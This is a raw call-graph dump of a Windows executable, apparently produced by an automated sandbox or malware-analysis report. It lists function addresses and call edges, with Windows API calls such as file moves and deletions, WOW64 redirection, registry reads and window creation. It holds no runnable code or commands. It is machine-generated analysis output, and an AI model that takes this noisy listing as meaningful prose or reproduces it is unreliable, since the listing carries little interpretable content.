490507 50317->50325 50471 42c4c4 19 API calls 50318->50471 50321 490464 50319->50321 50322 44684c 32 API calls 50321->50322 50326 490475 50322->50326 50323 490431 50472 446ba0 19 API calls 50323->50472 50397 44684c 50324->50397 50332 490546 50325->50332 50333 490516 50325->50333 50473 48ffd4 26 API calls 50326->50473 50331 490483 50474 446ba0 19 API calls 50331->50474 50341 490585 50332->50341 50342 490555 50332->50342 50336 44684c 32 API calls 50333->50336 50338 490523 50336->50338 50337 4904be 50339 4904c2 50337->50339 50340 4904f7 50337->50340 50477 451f78 50338->50477 50345 44684c 32 API calls 50339->50345 50476 446924 19 API calls 50340->50476 50354 4905c4 50341->50354 50355 490594 50341->50355 50347 44684c 32 API calls 50342->50347 50346 4904d1 50345->50346 50402 4522f0 50346->50402 50351 490562 50347->50351 50348 490530 50484 446924 19 API calls 50348->50484 50485 451de0 50351->50485 50352 4904e1 50475 446924 19 API calls 50352->50475 50362 49060c 50354->50362 50363 4905d3 50354->50363 50356 44684c 32 API calls 50355->50356 50359 4905a1 50356->50359 50358 49056f 50492 446924 19 API calls 50358->50492 50493 452480 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 50359->50493 50368 49061b 50362->50368 50369 490654 50362->50369 50365 44684c 32 API calls 50363->50365 50364 4905ae 50494 446924 19 API calls 50364->50494 50367 4905e2 50365->50367 50370 44684c 32 API calls 50367->50370 50371 44684c 32 API calls 50368->50371 50374 490667 50369->50374 50381 49071d 50369->50381 50372 4905f3 50370->50372 50373 49062a 50371->50373 50495 446acc 50372->50495 50375 44684c 32 API calls 50373->50375 50377 44684c 32 API calls 50374->50377 50378 49063b 50375->50378 50379 490694 50377->50379 50384 446acc 19 API calls 50378->50384 50380 44684c 32 API calls 50379->50380 50382 4906ab 50380->50382 50381->50296 50504 4467f0 32 API calls 50381->50504 50501 407de4 21 API calls 50382->50501 50384->50296 50385 490736 50505 42e73c FormatMessageA 50385->50505 50390 4906cd 50391 44684c 32 API calls 50390->50391 50392 4906e1 50391->50392 50502 408510 18 API calls 50392->50502 50394 4906ec 50503 446ba0 19 API calls 50394->50503 50396 4906f8 50398 446854 50397->50398 50514 4358cc 50398->50514 50400 446873 50401 42c5d4 21 API calls 50400->50401 50401->50337 50540 451d94 50402->50540 50404 45230d 50404->50352 50405 452309 50405->50404 50406 452331 MoveFileA GetLastError 50405->50406 50546 451dd0 50406->50546 50409->50296 50411 406bc7 50410->50411 50412 406be0 50411->50412 50413 406be9 50411->50413 50414 403400 4 API calls 50412->50414 50549 403778 50413->50549 50415 406be7 50414->50415 50417 446ba0 19 API calls 50415->50417 50417->50296 50418->50234 50419->50296 50420->50240 50421->50296 50422->50243 50423->50296 50556 403738 50424->50556 50427->50296 50429 403738 50428->50429 50430 42c7f3 GetFullPathNameA 50429->50430 50431 42c816 50430->50431 50432 42c7ff 50430->50432 50434 403494 4 API calls 50431->50434 50432->50431 50433 42c807 50432->50433 50435 4034e0 18 API calls 50433->50435 50436 42c814 50434->50436 50435->50436 50437 446ba0 19 API calls 50436->50437 50437->50296 50438->50267 50439->50296 50440->50278 50441->50296 50558 42c768 50442->50558 50445 403778 18 API calls 50446 42c891 50445->50446 50447 446ba0 19 API calls 50446->50447 50447->50296 50573 42c640 50448->50573 50451 42c8b5 50454 403778 18 API calls 50451->50454 50452 42c8ac 50453 403400 4 API calls 50452->50453 50455 42c8b3 50453->50455 50454->50455 50456 446ba0 19 API calls 50455->50456 50456->50296 50457->50297 50458->50296 50460 42c768 IsDBCSLeadByte 50459->50460 50461 42c908 50460->50461 50462 403778 18 API calls 50461->50462 50463 42c91a 50462->50463 50464 446ba0 19 API calls 50463->50464 50464->50296 50466 42c768 IsDBCSLeadByte 50465->50466 50467 42c930 50466->50467 50468 403778 18 API calls 50467->50468 50469 42c941 50468->50469 50470 446ba0 19 API calls 50469->50470 50470->50296 50471->50323 50472->50296 50473->50331 50474->50296 50475->50296 50476->50296 50478 451d94 2 API calls 50477->50478 50479 451f8e 50478->50479 50480 451f92 50479->50480 50481 451fae DeleteFileA GetLastError 50479->50481 50480->50348 50482 451dd0 Wow64RevertWow64FsRedirection 50481->50482 50483 451fd4 50482->50483 50483->50348 50484->50296 50486 451d94 2 API calls 50485->50486 50488 451df6 50486->50488 50487 451dfa 50487->50358 50488->50487 50489 451e18 CreateDirectoryA GetLastError 50488->50489 50490 451dd0 Wow64RevertWow64FsRedirection 50489->50490 50491 451e3e 50490->50491 50491->50358 50492->50296 50493->50364 50494->50296 50496 446ad4 50495->50496 50576 435c34 VariantClear 50496->50576 50498 446af7 50499 446b0e 50498->50499 50577 408c14 18 API calls 50498->50577 50499->50296 50501->50390 50502->50394 50503->50396 50504->50385 50506 42e762 50505->50506 50507 4034e0 18 API calls 50506->50507 50508 42e77f 50507->50508 50509 446ba0 19 API calls 50508->50509 50509->50296 50512 403426 50510->50512 50511 40344b 50511->50221 50512->50511 50513 402660 4 API calls 50512->50513 50513->50512 50515 4358d8 50514->50515 50516 4358fa 50514->50516 50515->50516 50534 408c14 18 API calls 50515->50534 50517 43597d 50516->50517 50519 435941 50516->50519 50520 435971 50516->50520 50521 435965 50516->50521 50522 43594d 50516->50522 50533 435959 50516->50533 50539 408c14 18 API calls 50517->50539 50535 403510 50519->50535 50538 4040e8 32 API calls 50520->50538 50524 403494 4 API calls 50521->50524 50527 403510 18 API calls 50522->50527 50528 43596e 50524->50528 50532 435956 50527->50532 50528->50400 50529 43597a 50529->50400 50531 43598e 50531->50400 50532->50400 50533->50400 50534->50516 50536 4034e0 18 API calls 50535->50536 50537 40351d 50536->50537 50537->50400 50538->50529 50539->50531 50541 451da2 50540->50541 50542 451d9e 50540->50542 50543 451dc4 SetLastError 50541->50543 50544 451dab Wow64DisableWow64FsRedirection 50541->50544 50542->50405 50545 451dbf 50543->50545 50544->50545 50545->50405 50547 451dd5 Wow64RevertWow64FsRedirection 50546->50547 50548 451ddf 50546->50548 50547->50548 50548->50352 50550 4037aa 50549->50550 50551 40377d 50549->50551 50552 403400 4 API calls 50550->50552 50551->50550 50553 403791 50551->50553 50555 4037a0 50552->50555 50554 4034e0 18 API calls 50553->50554 50554->50555 50555->50415 50557 40373c SetCurrentDirectoryA 50556->50557 50557->50253 50563 42c648 50558->50563 50560 42c7c7 50560->50445 50561 42c77d 50561->50560 50570 42c454 IsDBCSLeadByte 50561->50570 50566 42c659 50563->50566 50564 42c6bd 50567 42c6b8 50564->50567 50572 42c454 IsDBCSLeadByte 50564->50572 50566->50564 50569 42c677 50566->50569 50567->50561 50569->50567 50571 42c454 IsDBCSLeadByte 50569->50571 50570->50561 50571->50569 50572->50567 50574 42c648 IsDBCSLeadByte 50573->50574 50575 42c647 50574->50575 50575->50451 50575->50452 50576->50498 50577->50499 50578 46ae54 50579 46ae8a 50578->50579 50613 46b17e 50578->50613 50580 46aec6 50579->50580 50582 46af10 50579->50582 50583 46af21 50579->50583 50584 46aeee 50579->50584 50585 46aeff 50579->50585 50586 46aedd 50579->50586 50580->50613 50654 4684b0 50580->50654 50581 403400 4 API calls 50587 46b1b8 50581->50587 50836 46abd4 81 API calls 50582->50836 50837 46ade4 59 API calls 50583->50837 50835 46a8cc 56 API calls 50584->50835 50619 46aa14 50585->50619 50834 46a764 61 API calls 50586->50834 50593 403400 4 API calls 50587->50593 50597 46b1c0 50593->50597 50595 46af5a 50595->50613 50614 46af9c 50595->50614 50838 493404 50595->50838 50596 46aee3 50596->50580 50596->50613 50600 46b0b0 50857 481b1c 137 API calls 50600->50857 50601 414af8 18 API calls 50601->50614 50604 42cb8c 20 API calls 50604->50614 50605 46b0c9 50605->50613 50609 403450 18 API calls 50609->50614 50611 46b161 50615 46a11c 37 API calls 50611->50615 50612 46b11d 50858 457214 50612->50858 50613->50581 50614->50600 50614->50601 50614->50604 50614->50609 50614->50611 50614->50612 50614->50613 50657 4683ec 50614->50657 50665 46a03c 50614->50665 50672 46973c 50614->50672 50725 46a11c 50614->50725 50763 481650 50614->50763 50866 46a520 33 API calls 50614->50866 50615->50613 50618 457214 38 API calls 50618->50611 50867 46b5f0 50619->50867 50622 46ab96 50623 403420 4 API calls 50622->50623 50625 46abb0 50623->50625 50626 403400 4 API calls 50625->50626 50629 46abb8 50626->50629 50627 46aa62 50653 46ab82 50627->50653 50874 4554b0 27 API calls 50627->50874 50628 403450 18 API calls 50628->50622 50631 403400 4 API calls 50629->50631 50632 46abc0 50631->50632 50632->50580 50634 46ab45 50634->50622 50639 42cd14 21 API calls 50634->50639 50634->50653 50636 46aa80 50637 46aae5 50636->50637 50875 465e14 50636->50875 50637->50622 50637->50634 50884 42cd14 50637->50884 50642 46ab5b 50639->50642 50647 450ac8 18 API calls 50642->50647 50642->50653 50644 465e14 33 API calls 50646 46aac0 50644->50646 50879 450a98 50646->50879 50649 46ab72 50647->50649 50891 47d6ec 56 API calls 50649->50891 50653->50622 50653->50628 50655 4683ec 33 API calls 50654->50655 50656 4684bf 50655->50656 50656->50595 50658 46841b 50657->50658 50659 4078fc 33 API calls 50658->50659 50662 46845c 50658->50662 50660 468454 50659->50660 51115 4529b4 18 API calls 50660->51115 50663 403400 4 API calls 50662->50663 50664 468474 50663->50664 50664->50614 50666 46a04d 50665->50666 50667 46a048 50665->50667 51201 4692bc 60 API calls 50666->51201 50671 46a04b 50667->50671 51116 469aa8 50667->51116 50669 46a055 50669->50614 50671->50614 50673 403400 4 API calls 50672->50673 50674 469769 50673->50674 51551 47c748 50674->51551 50676 4697b8 50677 4697d5 50676->50677 50678 4697bc 50676->50678 50680 4697c6 50677->50680 51572 4932f4 18 API calls 50677->51572 51569 466014 50678->51569 50683 4698a1 50680->50683 50684 46990c 50680->50684 50724 4699d8 50680->50724 50682 403420 4 API calls 50686 469a14 50682->50686 50687 403494 4 API calls 50683->50687 50688 403494 4 API calls 50684->50688 50685 4697f1 50685->50680 50689 4697f9 50685->50689 50686->50614 50690 4698ae 50687->50690 50691 469919 50688->50691 50692 46a11c 37 API calls 50689->50692 50694 40357c 18 API calls 50690->50694 50695 40357c 18 API calls 50691->50695 50693 469806 50692->50693 51573 42f3d4 50693->51573 50697 4698bb 50694->50697 50698 469926 50695->50698 50700 40357c 18 API calls 50697->50700 50701 40357c 18 API calls 50698->50701 50704 4698c8 50700->50704 50702 469933 50701->50702 50706 40357c 18 API calls 50702->50706 50705 40357c 18 API calls 50704->50705 50708 4698d5 50705->50708 50709 469940 50706->50709 50707 46984d 50707->50614 50710 466014 34 API calls 50708->50710 50711 40357c 18 API calls 50709->50711 50712 4698e3 50710->50712 50713 46994e 50711->50713 50714 40357c 18 API calls 50712->50714 50715 414b28 18 API calls 50713->50715 50716 4698ec 50714->50716 50717 46990a 50715->50717 50718 40357c 18 API calls 50716->50718 51590 46634c 50717->51590 50720 4698f9 50718->50720 50721 414b28 18 API calls 50720->50721 50721->50717 50724->50682 50726 4683ec 33 API calls 50725->50726 50728 46a134 50726->50728 50727 46a168 51752 464af4 50727->51752 50728->50727 50729 464af4 21 API calls 50728->50729 50729->50727 50733 46a180 50735 46a26a 50733->50735 50736 46a1ce 50733->50736 51773 46a0d0 33 API calls 50733->51773 50738 46a32c GetSystemMenu EnableMenuItem 50735->50738 50737 4683ec 33 API calls 50736->50737 50737->50735 50739 414b28 18 API calls 50738->50739 50740 46a34c 50739->50740 50741 46a382 50740->50741 50742 46a358 50740->50742 50745 46a3a1 50741->50745 50746 46a3cb 50741->50746 50743 414b28 18 API calls 50742->50743 50744 46a36c 50743->50744 50747 414b28 18 API calls 50744->50747 50748 414b28 18 API calls 50745->50748 50749 414b28 18 API calls 50746->50749 50750 46a380 50747->50750 50751 46a3b5 50748->50751 50752 46a3df 50749->50752 51769 46a064 50750->51769 50754 414b28 18 API calls 50751->50754 50753 414b28 18 API calls 50752->50753 50753->50750 50754->50750 50758 4684b0 33 API calls 50761 46a47d 50758->50761 50759 46a41d 50759->50758 50760 46a4e0 50760->50614 50761->50760 51775 493350 32 API calls 50761->51775 50764 46b5f0 61 API calls 50763->50764 50765 481693 50764->50765 50766 48169c 50765->50766 51975 408be8 19 API calls 50765->51975 50768 414af8 18 API calls 50766->50768 50769 4816ac 50768->50769 50770 403450 18 API calls 50769->50770 50771 4816b9 50770->50771 51795 46b900 50771->51795 50774 4816c9 50775 414af8 18 API calls 50774->50775 50777 4816d9 50775->50777 50778 403450 18 API calls 50777->50778 50779 4816e6 50778->50779 50780 4690a4 SendMessageA 50779->50780 50781 4816ff 50780->50781 50782 48173d 50781->50782 51977 478bf8 37 API calls 50781->51977 50784 4241ec 11 API calls 50782->50784 50785 481747 50784->50785 50786 481758 SetActiveWindow 50785->50786 50787 48176d 50785->50787 50786->50787 51824 480c4c 50787->51824 50834->50596 50835->50580 50836->50580 50837->50580 53684 43d21c 50838->53684 50841 493430 53689 431424 50841->53689 50842 4934b6 50843 4934c5 50842->50843 53722 492c2c 18 API calls 50842->53722 50843->50614 50852 49347a 53720 492cc0 18 API calls 50852->53720 50854 49348e 53721 433624 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50854->53721 50856 4934ae 50856->50614 50857->50605 50859 457239 50858->50859 50860 457259 50859->50860 50861 4078fc 33 API calls 50859->50861 50863 403400 4 API calls 50860->50863 50862 457251 50861->50862 50864 457008 38 API calls 50862->50864 50865 45726e 50863->50865 50864->50860 50865->50618 50866->50614 50892 46b67c 50867->50892 50870 414af8 50871 414b06 50870->50871 50872 4034e0 18 API calls 50871->50872 50873 414b13 50872->50873 50873->50627 50874->50636 50876 465e2e 50875->50876 51066 4078fc 50876->51066 50880 450ab8 50879->50880 51109 42cc98 50884->51109 50887 450ac8 50888 450a98 18 API calls 50887->50888 50889 450ae4 50888->50889 50890 47d6ec 56 API calls 50889->50890 50890->50634 50891->50653 50893 414af8 18 API calls 50892->50893 50894 46b6ae 50893->50894 50946 4660ac 50894->50946 50898 46b6c0 50899 46b6cf 50898->50899 50901 46b6e8 50898->50901 51000 47d6ec 56 API calls 50899->51000 50903 46b72f 50901->50903 50905 46b716 50901->50905 50902 403420 4 API calls 50904 46aa46 50902->50904 50906 46b794 50903->50906 50919 46b733 50903->50919 50904->50622 50904->50870 51001 47d6ec 56 API calls 50905->51001 51003 42cb18 CharNextA 50906->51003 50909 46b7a3 50910 46b7a7 50909->50910 50914 46b7c0 50909->50914 51004 47d6ec 56 API calls 50910->51004 50912 46b77b 51002 47d6ec 56 API calls 50912->51002 50913 46b7e4 51005 47d6ec 56 API calls 50913->51005 50914->50913 50960 46621c 50914->50960 50919->50912 50919->50914 50922 46b7fd 50923 403778 18 API calls 50922->50923 50924 46b813 50923->50924 50968 42c968 50924->50968 50927 46b824 51006 4662a8 18 API calls 50927->51006 50928 46b852 50930 42c898 19 API calls 50928->50930 50932 46b85d 50930->50932 50931 46b837 50933 450ac8 18 API calls 50931->50933 50972 42c40c 50932->50972 50935 46b844 50933->50935 51007 47d6ec 56 API calls 50935->51007 50936 46b868 50982 42cb8c 50936->50982 50945 46b6e3 50945->50902 50947 4660c6 50946->50947 50949 42cb8c 20 API calls 50947->50949 50950 403450 18 API calls 50947->50950 50951 406bb8 18 API calls 50947->50951 50952 46610f 50947->50952 51009 42ca78 50947->51009 50949->50947 50950->50947 50951->50947 50953 403420 4 API calls 50952->50953 50954 466129 50953->50954 50955 414b28 50954->50955 50956 414af8 18 API calls 50955->50956 50957 414b4c 50956->50957 50958 403400 4 API calls 50957->50958 50959 414b7d 50958->50959 50959->50898 50961 466226 50960->50961 50962 466239 50961->50962 51039 42cb08 CharNextA 50961->51039 50962->50913 50964 46624c 50962->50964 50965 466256 50964->50965 50966 466283 50965->50966 51040 42cb08 CharNextA 50965->51040 50966->50913 50966->50922 50969 42c9c1 50968->50969 50970 42c97e 50968->50970 50969->50927 50969->50928 50970->50969 51041 42cb08 CharNextA 50970->51041 50973 42c416 50972->50973 50974 42c439 50972->50974 51042 42c948 CharPrevA 50973->51042 50976 403494 4 API calls 50974->50976 50977 42c442 50976->50977 50977->50936 50978 42c41d 50978->50974 50979 42c428 50978->50979 51043 4035c0 50979->51043 50981 42c436 50981->50936 50983 42c648 IsDBCSLeadByte 50982->50983 50984 42cb9d 50983->50984 50985 42cbc4 50984->50985 51065 42cb10 CharPrevA 50984->51065 51000->50945 51001->50945 51002->50945 51003->50909 51004->50945 51005->50945 51006->50931 51007->50945 51010 403494 4 API calls 51009->51010 51011 42ca88 51010->51011 51016 42cabe 51011->51016 51018 403744 51011->51018 51022 42c454 IsDBCSLeadByte 51011->51022 51014 42cb02 51014->50947 51016->51014 51023 4037b8 51016->51023 51028 42c454 IsDBCSLeadByte 51016->51028 51019 40374a 51018->51019 51021 40375b 51018->51021 51020 4034bc 18 API calls 51019->51020 51019->51021 51020->51021 51021->51011 51022->51011 51024 403744 18 API calls 51023->51024 51026 4037c6 51024->51026 51025 4037fc 51025->51016 51026->51025 51029 4038a4 51026->51029 51028->51016 51030 4038b1 51029->51030 51037 4038e1 51029->51037 51031 4038da 51030->51031 51034 4038bd 51030->51034 51035 4034bc 18 API calls 51031->51035 51032 403400 4 API calls 51033 4038cb 51032->51033 51033->51025 51038 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51034->51038 51035->51037 51037->51032 51038->51033 51039->50961 51040->50965 51041->50970 51042->50978 51044 4035c4 51043->51044 51050 40357c 51043->51050 51045 403450 51044->51045 51046 4035e2 51044->51046 51047 4035d4 51044->51047 51044->51050 51052 4034bc 18 API calls 51045->51052 51054 403464 51045->51054 51049 4034bc 18 API calls 51046->51049 51053 403450 18 API calls 51047->51053 51050->51045 51051 4035bf 51050->51051 51055 40358a 51050->51055 51051->50981 51052->51054 51053->51050 51057 4035b4 51055->51057 51058 40359d 51055->51058 51065->50984 51069 407910 51066->51069 51070 40792d 51069->51070 51077 4075c0 51070->51077 51073 407959 51074 4034e0 18 API calls 51073->51074 51076 40790b 51074->51076 51076->50644 51080 4075db 51077->51080 51078 4075ed 51078->51073 51082 4069a8 19 API calls 51078->51082 51080->51078 51083 4076e2 33 API calls 51080->51083 51084 4075b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51080->51084 51082->51073 51083->51080 51084->51080 51110 42cb8c 20 API calls 51109->51110 51111 42ccba 51110->51111 51112 42ccc2 GetFileAttributesA 51111->51112 51113 403400 4 API calls 51112->51113 51114 42ccdf 51113->51114 51114->50634 51114->50887 51115->50662 51118 469aef 51116->51118 51117 469f67 51119 469f82 51117->51119 51120 469fb3 51117->51120 51118->51117 51121 469baa 51118->51121 51125 403494 4 API calls 51118->51125 51124 403494 4 API calls 51119->51124 51122 403494 4 API calls 51120->51122 51123 469bcb 51121->51123 51127 469c0c 51121->51127 51126 469fc1 51122->51126 51128 403494 4 API calls 51123->51128 51129 469f90 51124->51129 51130 469b2e 51125->51130 51223 468998 26 API calls 51126->51223 51131 403400 4 API calls 51127->51131 51133 469bd9 51128->51133 51222 468998 26 API calls 51129->51222 51135 414af8 18 API calls 51130->51135 51136 469c0a 51131->51136 51137 414af8 18 API calls 51133->51137 51139 469b4f 51135->51139 51159 469cf0 51136->51159 51202 4690a4 51136->51202 51141 469bfa 51137->51141 51138 469f9e 51140 403400 4 API calls 51138->51140 51142 403634 18 API calls 51139->51142 51145 469fe4 51140->51145 51147 403634 18 API calls 51141->51147 51143 469b5f 51142->51143 51148 414af8 18 API calls 51143->51148 51151 403400 4 API calls 51145->51151 51146 469d78 51149 403400 4 API calls 51146->51149 51147->51136 51152 469b73 51148->51152 51153 469d76 51149->51153 51150 469c2c 51154 469c32 51150->51154 51155 469c6a 51150->51155 51156 469fec 51151->51156 51152->51121 51162 414af8 18 API calls 51152->51162 51217 4694e0 57 API calls 51153->51217 51157 403494 4 API calls 51154->51157 51160 403400 4 API calls 51155->51160 51158 403420 4 API calls 51156->51158 51163 469c40 51157->51163 51164 469ff9 51158->51164 51159->51146 51165 469d37 51159->51165 51161 469c68 51160->51161 51211 469398 51161->51211 51166 469b9a 51162->51166 51208 47af6c 51163->51208 51164->50671 51169 403494 4 API calls 51165->51169 51170 403634 18 API calls 51166->51170 51173 469d45 51169->51173 51170->51121 51171 469da1 51180 469e02 51171->51180 51181 469dac 51171->51181 51172 469c58 51176 403634 18 API calls 51172->51176 51174 414af8 18 API calls 51173->51174 51177 469d66 51174->51177 51176->51161 51179 403634 18 API calls 51177->51179 51178 469c91 51184 469cf2 51178->51184 51185 469c9c 51178->51185 51179->51153 51182 403400 4 API calls 51180->51182 51183 403494 4 API calls 51181->51183 51186 469e0a 51182->51186 51190 469dba 51183->51190 51187 403400 4 API calls 51184->51187 51188 403494 4 API calls 51185->51188 51189 469e00 51186->51189 51200 469eb3 51186->51200 51187->51159 51193 469caa 51188->51193 51189->51186 51218 4932f4 18 API calls 51189->51218 51190->51186 51190->51189 51195 403634 18 API calls 51190->51195 51192 469e2d 51192->51200 51219 4935a0 32 API calls 51192->51219 51193->51159 51196 403634 18 API calls 51193->51196 51195->51190 51196->51193 51198 469f54 51221 429154 SendMessageA SendMessageA 51198->51221 51220 429104 SendMessageA 51200->51220 51201->50669 51224 42a050 SendMessageA 51202->51224 51204 4690b3 51205 4690d3 51204->51205 51225 42a050 SendMessageA 51204->51225 51205->51150 51207 4690c3 51207->51150 51226 47af8c 51208->51226 51213 4693c5 51211->51213 51212 469427 51214 403400 4 API calls 51212->51214 51213->51212 51550 46931c 57 API calls 51213->51550 51215 46943c 51214->51215 51215->51178 51217->51171 51218->51192 51219->51200 51220->51198 51221->51117 51222->51138 51223->51138 51224->51204 51225->51207 51227 403494 4 API calls 51226->51227 51234 47afbf 51227->51234 51228 47b0c4 51229 403420 4 API calls 51228->51229 51230 47af87 51229->51230 51230->51172 51232 403778 18 API calls 51232->51234 51234->51228 51234->51232 51237 4037b8 18 API calls 51234->51237 51238 479ee0 51234->51238 51470 4529b4 18 API calls 51234->51470 51471 403800 51234->51471 51475 42c948 CharPrevA 51234->51475 51237->51234 51239 479f32 51238->51239 51240 479f10 51238->51240 51241 479f52 51239->51241 51242 479f40 51239->51242 51240->51239 51480 478e10 33 API calls 51240->51480 51245 479fb5 51241->51245 51246 479f60 51241->51246 51243 403494 4 API calls 51242->51243 51469 479f4d 51243->51469 51253 479fd6 51245->51253 51254 479fc3 51245->51254 51247 479f8f 51246->51247 51248 479f69 51246->51248 51251 479fa2 51247->51251 51482 4529b4 18 API calls 51247->51482 51250 479f7c 51248->51250 51481 4529b4 18 API calls 51248->51481 51249 403400 4 API calls 51252 47a860 51249->51252 51256 403494 4 API calls 51250->51256 51258 403494 4 API calls 51251->51258 51259 403400 4 API calls 51252->51259 51262 479ff7 51253->51262 51263 479fe4 51253->51263 51260 403494 4 API calls 51254->51260 51256->51469 51258->51469 51261 47a868 51259->51261 51260->51469 51261->51234 51265 47a047 51262->51265 51266 47a005 51262->51266 51264 403494 4 API calls 51263->51264 51264->51469 51273 47a055 51265->51273 51274 47a068 51265->51274 51267 47a021 51266->51267 51268 47a00e 51266->51268 51269 47a034 51267->51269 51483 4529b4 18 API calls 51267->51483 51270 403494 4 API calls 51268->51270 51272 403494 4 API calls 51269->51272 51270->51469 51272->51469 51275 403494 4 API calls 51273->51275 51276 47a076 51274->51276 51277 47a089 51274->51277 51275->51469 51278 403494 4 API calls 51276->51278 51279 47a097 51277->51279 51280 47a0aa 51277->51280 51278->51469 51281 403494 4 API calls 51279->51281 51282 47a0cb 51280->51282 51283 47a0b8 51280->51283 51281->51469 51285 47a0d9 51282->51285 51286 47a108 51282->51286 51284 403494 4 API calls 51283->51284 51284->51469 51287 47a0f5 51285->51287 51288 47a0e2 51285->51288 51291 47a116 51286->51291 51292 47a145 51286->51292 51290 403494 4 API calls 51287->51290 51289 403494 4 API calls 51288->51289 51289->51469 51290->51469 51293 47a132 51291->51293 51294 47a11f 51291->51294 51297 47a166 51292->51297 51298 47a153 51292->51298 51295 403494 4 API calls 51293->51295 51296 403494 4 API calls 51294->51296 51295->51469 51296->51469 51300 47a187 51297->51300 51301 47a174 51297->51301 51299 403494 4 API calls 51298->51299 51299->51469 51303 47a195 51300->51303 51304 47a1c0 51300->51304 51302 403494 4 API calls 51301->51302 51302->51469 51305 47a1b1 51303->51305 51306 47a19e 51303->51306 51309 47a1ce 51304->51309 51310 47a1f9 51304->51310 51484 4529b4 18 API calls 51305->51484 51307 403494 4 API calls 51306->51307 51307->51469 51311 47a1d7 51309->51311 51312 47a1ea 51309->51312 51315 47a207 51310->51315 51316 47a219 51310->51316 51469->51249 51470->51234 51472 403804 51471->51472 51474 40382f 51471->51474 51473 4038a4 18 API calls 51472->51473 51473->51474 51474->51234 51475->51234 51480->51240 51481->51250 51482->51251 51483->51269 51484->51469 51550->51213 51552 47c7ac 51551->51552 51555 47c776 51551->51555 51553 403420 4 API calls 51552->51553 51554 47c8c0 51553->51554 51554->50676 51594 455238 51555->51594 51557 47c889 51557->50676 51560 47c7a0 51560->51552 51560->51557 51562 47af6c 57 API calls 51560->51562 51566 47c835 51560->51566 51601 47838c 51560->51601 51612 4784f0 51560->51612 51616 47c310 45 API calls 51560->51616 51561 47af6c 57 API calls 51561->51566 51562->51560 51563 42c8f8 19 API calls 51563->51566 51565 42c920 19 API calls 51565->51566 51566->51560 51566->51561 51566->51563 51566->51565 51568 47c876 51566->51568 51617 47c458 72 API calls 51566->51617 51568->51552 51679 465f28 51569->51679 51572->50685 51574 42f3e0 51573->51574 51575 42f403 GetActiveWindow GetFocus 51574->51575 51576 41eeb4 2 API calls 51575->51576 51577 42f41a 51576->51577 51578 42f437 51577->51578 51579 42f427 RegisterClassA 51577->51579 51580 42f4c6 SetFocus 51578->51580 51581 42f445 CreateWindowExA 51578->51581 51579->51578 51583 403400 4 API calls 51580->51583 51581->51580 51582 42f478 51581->51582 51710 42428c 51582->51710 51585 42f4e2 51583->51585 51589 4935a0 32 API calls 51585->51589 51586 42f4a0 51587 42f4a8 CreateWindowExA 51586->51587 51587->51580 51588 42f4be ShowWindow 51587->51588 51588->51580 51589->50707 51716 44ad68 51590->51716 51595 455249 51594->51595 51596 455256 51595->51596 51597 45524d 51595->51597 51626 45501c 43 API calls 51596->51626 51618 454f3c 51597->51618 51600 455253 51600->51560 51602 4783a2 51601->51602 51603 47839e 51601->51603 51604 403450 18 API calls 51602->51604 51603->51560 51605 4783af 51604->51605 51606 4783b5 51605->51606 51607 4783cf 51605->51607 51655 47824c 51606->51655 51609 47824c 33 API calls 51607->51609 51610 4783cb 51609->51610 51611 403400 4 API calls 51610->51611 51611->51603 51613 4784fc 51612->51613 51614 478517 51613->51614 51678 4529b4 18 API calls 51613->51678 51614->51560 51616->51560 51617->51566 51627 42dd44 51618->51627 51620 454f59 51621 454fa7 51620->51621 51630 454e70 51620->51630 51621->51600 51624 454e70 20 API calls 51625 454f88 RegCloseKey 51624->51625 51625->51600 51626->51600 51628 42dd55 RegOpenKeyExA 51627->51628 51629 42dd4f 51627->51629 51628->51620 51629->51628 51635 42dc80 51630->51635 51632 403420 4 API calls 51633 454f22 51632->51633 51633->51624 51634 454e98 51634->51632 51638 42db28 51635->51638 51639 42db4e RegQueryValueExA 51638->51639 51645 42db71 51639->51645 51654 42db93 51639->51654 51640 403400 4 API calls 51642 42dc5f 51640->51642 51641 42db8b 51643 403400 4 API calls 51641->51643 51642->51634 51643->51654 51644 4034e0 18 API calls 51644->51645 51645->51641 51645->51644 51646 403744 18 API calls 51645->51646 51645->51654 51647 42dbc8 RegQueryValueExA 51646->51647 51647->51639 51648 42dbe4 51647->51648 51649 4038a4 18 API calls 51648->51649 51648->51654 51650 42dc26 51649->51650 51651 42dc38 51650->51651 51653 403744 18 API calls 51650->51653 51652 403450 18 API calls 51651->51652 51652->51654 51653->51651 51654->51640 51656 478267 51655->51656 51658 478298 51656->51658 51659 478326 51656->51659 51673 478100 33 API calls 51656->51673 51657 4782bd 51663 4782de 51657->51663 51675 478100 33 API calls 51657->51675 51658->51657 51674 478100 33 API calls 51658->51674 51659->51610 51663->51659 51664 47831e 51663->51664 51676 4529b4 18 API calls 51663->51676 51667 477f84 51664->51667 51668 477fbf 51667->51668 51669 403450 18 API calls 51668->51669 51670 477fe4 51669->51670 51677 476674 33 API calls 51670->51677 51672 478025 51672->51659 51673->51658 51674->51657 51675->51663 51676->51664 51677->51672 51678->51614 51680 403494 4 API calls 51679->51680 51681 465f56 51680->51681 51696 42daf0 51681->51696 51684 42daf0 19 API calls 51685 465f7a 51684->51685 51686 465e14 33 API calls 51685->51686 51687 465f84 51686->51687 51688 42daf0 19 API calls 51687->51688 51689 465f93 51688->51689 51699 465e8c 51689->51699 51692 42daf0 19 API calls 51693 465fac 51692->51693 51694 403400 4 API calls 51693->51694 51695 465fc1 51694->51695 51695->50680 51703 42da38 51696->51703 51700 465eac 51699->51700 51701 4078fc 33 API calls 51700->51701 51702 465ef6 51701->51702 51702->51692 51704 42dae3 51703->51704 51707 42da58 51703->51707 51704->51684 51705 4037b8 18 API calls 51705->51707 51707->51704 51707->51705 51708 403800 18 API calls 51707->51708 51709 42c454 IsDBCSLeadByte 51707->51709 51708->51707 51709->51707 51711 4242be 51710->51711 51712 42429e GetWindowTextA 51710->51712 51714 403494 4 API calls 51711->51714 51713 4034e0 18 API calls 51712->51713 51715 4242bc 51713->51715 51714->51715 51715->51586 51719 44abe0 51716->51719 51720 44ac13 51719->51720 51721 414af8 18 API calls 51720->51721 51722 44ac26 51721->51722 51723 40357c 18 API calls 51722->51723 51724 44ac53 73A1A570 51722->51724 51723->51724 51730 41a1f8 51724->51730 51727 44ac84 51738 44a914 51727->51738 51731 41a223 51730->51731 51732 41a2bf 51730->51732 51749 403520 51731->51749 51733 403400 4 API calls 51732->51733 51734 41a2d7 SelectObject 